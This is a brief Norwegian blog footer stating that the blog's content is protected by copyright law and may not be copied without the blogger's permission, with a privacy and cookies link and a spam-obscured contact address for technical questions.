Denne bloggen er underlagt Lov om opphavsrett til åndsverk. Det betyr at du ikke kan kopiere tekst, bilder eller annet innhold uten tillatelse fra bloggeren. Forfatter er selv ansvarlig for innhold.
Personvern og cookies | Tekniske spørsmål rettes til post[att]lykkemedia.[dått]no.